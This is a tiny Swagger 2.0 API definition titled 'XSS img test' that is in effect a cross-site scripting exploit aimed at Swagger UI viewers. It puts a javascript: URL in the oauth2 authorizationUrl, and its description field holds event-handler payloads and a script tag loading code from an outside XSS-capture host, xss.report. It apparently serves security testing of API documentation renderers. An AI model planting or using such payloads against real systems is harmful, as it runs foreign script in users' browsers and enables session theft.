swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "1.0.0"
  title: XSS img test
  description: onload="alert(1)" <img src='"><script src=https://xss.report/c/drocapy></script> onclick="alert(2)" onerror="alert(3)">
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
